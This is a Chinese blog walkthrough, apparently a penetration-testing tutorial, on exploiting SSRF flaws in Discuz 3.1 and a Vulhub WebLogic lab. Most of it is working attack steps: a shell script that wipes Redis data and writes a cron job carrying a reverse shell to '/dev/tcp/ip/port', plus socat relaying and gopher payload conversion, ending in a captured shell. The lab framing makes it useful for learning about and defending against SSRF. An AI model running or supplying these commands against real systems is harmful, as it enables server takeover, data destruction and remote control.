当前位置:网站首页>【SSRF漏洞】实战演示 超详细讲解
【SSRF漏洞】实战演示 超详细讲解
2022-08-10 01:03:00 【摆烂阳】
博主昵称:摆烂阳
🥰博主主页链接https://blog.csdn.net/qinshuoyang1?type=blog
博主研究方向:web渗透测试 、python编程
博主寄语:希望本篇文章能给大家带来帮助,有不足的地方,希望友友们给予指导
————————————————

一、实战discuz3.1版本的ssrf漏洞
1、准备工作
第一步:
创建一个后缀为.sh的文件
文件内容为:
redis-cli -h $1 -p $2 flushall echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/ip/端口 0>&1\n\n\n"|redis-cli -h $1 -p $2 -x set 1 redis-cli -h $1 -p $2 config set dir /var/spool/cron/ redis-cli -h $1 -p $2 config set dbfilename root redis-cli -h $1 -p $2 save redis-cli -h $1 -p $2 quit

第二步:
2、运行该.sh文件

此时可以看到kali可以监听到

2、开始实战
第一步:
设置监听
先yum下载socat工具
yum install socat
Payload:
socat -v tcp-listen:端口,fork tcp-connect:localhost:6379

第二步:
4、再次发送请求
Payload:
bash ssrf.sh ip 端口


此时已经成功设置定时任务
第三步:
创建一个日志文件,保存数据

ps:注意格式一定要为unix 可以用 set ff 进行查看

第四步:
利用py脚本将日志文件中的内容进行转换为数据包
Payload:
python redis_ssrf.py 1.log

第五步:
将该数据包保存在kali的文件中

第六步:
kali开启监听,并在目标网站访问gopher.php文件

成功获取shell
二、实操vulhub靶场的ssrf漏洞
1、准备工作
(1)、 开启apache和sql服务,并关闭防火墙

(2)、开启redis服务

(3)、进入vulhub/weblogic/ssrf 目录下

(4)、打开docker服务

(5)、打开docker容器,并查看端口
打开docker容器:
docker-compose up -d
查看端口
docker-compose ps
ps:如果打开docker容器时发生错误,重启一下docker服务便可解决

2、开始实战
1、进入README.md文件中查看教程

2、进去目标网址,进行抓包

3、发送到repeater模块中,并修改信息

4、此时可以在centos中发现已经成功写入计划任务

5、在kali中开启监听

此时便已经获取了centos的shell
三、本章小结
通过SSRF漏洞的学习,我发现SSRF漏洞果然比CSRF漏洞的利用的局限性要小,并且SSRF漏洞对内网的一些应用危害比较大。所以在开发过程中,警惕大家要尽量避免产生SSRF漏洞。
另外警惕大家,网络并非法外之地,大家要谨遵网络安全法,不要做违纪违规的事情!
————————————————
边栏推荐
猜你喜欢
随机推荐
使用 GoogleTest 框架对 C 代码进行单元测试
Entity FrameWork Core教程,从基础应用到原理实战
Pagoda measurement - building LightPicture open source map bed system
【报错】ModuleNotFoundError: No module named ‘paramiko‘
基于Web的疫情隔离区订餐系统
以太网PHY芯片LAN8720A芯片研究
对修饰器的实验支持功能在将来的版本中可能更改。在 “tsconfig“ 或 “jsconfig“ 中设置 “experimentalDecorators“ 选项以删除此警告
GB28181 sip和RTSP(Real-Time Streaming Protocol)实时流控制协议
你有对象类,我有结构体,Go lang1.18入门精炼教程,由白丁入鸿儒,go lang结构体(struct)的使用EP06
Qt的pro文件递归搜寻添加文件
Unity vertex animation
Fedora 36 dnf 安装ModSecurity和 OWASP 核心规则集
无js实现弹出层效果
XSS详解及复现gallerycms字符长度限制短域名绕过
C语言头文件组织与包含原则
这一次,话筒给你:向自由软件之父 Richard M. Stallman 提问啦!
小程序中计算距离信息
OOD论文:Revisit Overconfidence for OOD Detection
Xi'an biotin-tetrapolyethylene glycol-amide-4phenol light yellow semi-solid
【wpf】自定义事件总结(Action, EventHandler)


![[论文阅读] Multimodal Unsupervised Image-to-Image Translation](/img/a2/78fd81046cc7cde79141a749c0647e.jpg)

![[论文阅读] Diverse Image-to-Image Translation via Disentangled Representations](/img/b8/891b8a8e7e70a1abd2016337ebc744.jpg)
![[LeetCode] Find the sum of the numbers from the root node to the leaf node](/img/1c/6c627e17a60f424601226504f4ff36.png)



